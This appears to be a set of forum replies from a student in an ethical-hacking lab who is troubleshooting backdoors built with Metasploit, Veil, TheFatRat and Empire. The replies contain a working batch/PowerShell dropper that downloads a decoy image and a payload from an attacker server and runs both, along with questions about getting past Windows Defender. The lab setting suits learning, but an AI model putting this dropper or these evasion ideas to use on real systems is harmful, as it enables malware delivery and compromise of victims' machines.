Forum Replies Created
- Posts
Sorry meant its disabled in the virtual machine, although when disabled it still detects and automatically deletes some backdoors.
Il try using different ports and payloads.
Currently tried reverse_http reverse_https and reverse_tcp although I tried on both ports 4444 and 8080 I will keep trying to change the port.
Failing that il see if I can create a backdoor using Veil and then change the code with hashcat to see if it works.
From my settings I’m not doing anything wrong though?
Windows Defender is disabled in the Windows host machine, some times it will still detect the backdoor if I used Veil, Fatrat is fine doesn’t get detected.
Images uploaded here: https://imgur.com/a/MwJNT5G
Yea its strange, tried with other direct links to images they didn’t load either.
Il host it on the apache2 server and see what happens.The Windows machine does have Internet access.
I’m compressing this and here is the output shown to the Windows machine:
In my File it doesn’t have all those symbols after the .jpg not sure where they came from when i copied and pasted.
Every time i type the .jpg link it seems to keep putting those symbols after :S which aren’t in the .bat file :S
this is an image of my file it doesn’t have the weird symbols after the .jpg:
when extracting the file it shows a folder as _gpj for some reason. The file its self does show as a .jpg once its all extracted though so that does help thanks.
the image is: https://images-cdn.9gag.com/photo/ag5pMyg_460s.jpg
my file is:
@echo offset files=’https://images-cdn.9gag.com/photo/ag5pMyg_460s.jpg’,‘http://10.0.2.15/evil-files/8080httpempire.bat’
powershell “(%files%)|foreach{$fileName=’%TEMP%’+(Split-Path -Path $_ -Leaf);(new-object http://System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}”
The connection works when Windows Defender is disabled. Windows Defender doesn’t block it or notice its a malicious file, why would it block the outgoing connection?
Would i have to rely on Veil, Empire or TheFatRat to create something that would give me a connection if windows defender is enabled?
Hi Diego,
uploaded all of the pictures you’ve requested to imgur, if you click the image below it should show all pictures
Hope this helps.
I don’t get any messages from Windows Defender when running the .bat file so i don’t think it blocks it.
